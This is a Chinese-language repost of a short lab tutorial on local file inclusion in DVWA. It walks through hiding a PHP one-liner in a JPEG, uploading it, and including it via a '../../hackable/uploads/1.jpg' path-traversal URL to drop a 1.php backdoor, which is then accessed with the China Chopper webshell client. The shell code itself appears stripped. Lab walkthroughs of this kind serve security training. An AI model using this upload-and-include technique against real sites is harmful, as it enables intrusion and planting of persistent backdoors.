首页 网络安全 渗透测试 查看内容

本地文件包含漏洞

2020-2-10 13:44 |来自: 互联网 1179 0

摘要: 一、本地文件包含漏洞:环境:DVWA,low级别1、制作一句话图片木马第一种方法:windows命令copy 1.jpg/b+1.php 2.jpg第二种方法:将照片拖入edjpgcom软件,添加下面这句话2、上传图片木马文件3、选择文件包含页面4、执行文件包含并生成后门192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackab ...
关键词: 级别 文件包 文件 DVWA vulnerabilities 木马 生成 环境 方法 jpg

一、本地文件包含漏洞:

环境:DVWA,low级别

1、制作一句话图片木马

第一种方法:

windows命令

copy 1.jpg/b+1.php 2.jpg

第二种方法:

将照片拖入edjpgcom软件,添加下面这句话

')?>

2、上传图片木马文件

3、选择文件包含页面

4、执行文件包含并生成后门

192.168.152.188/dvwa/vulnerabilities/fi/?page=../../hackable/uploads/1.jpg

5、在/var/www/dvwa/vulnerabilities/fi目录生成了1.php

6、菜刀链接

二、环境:DVWA,medium级别

同low级别

禁止非法,后果自负

欢迎关注公众号:web安全工具库

本文出处: https://www.toutiao.com/i6790271013683724813/
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部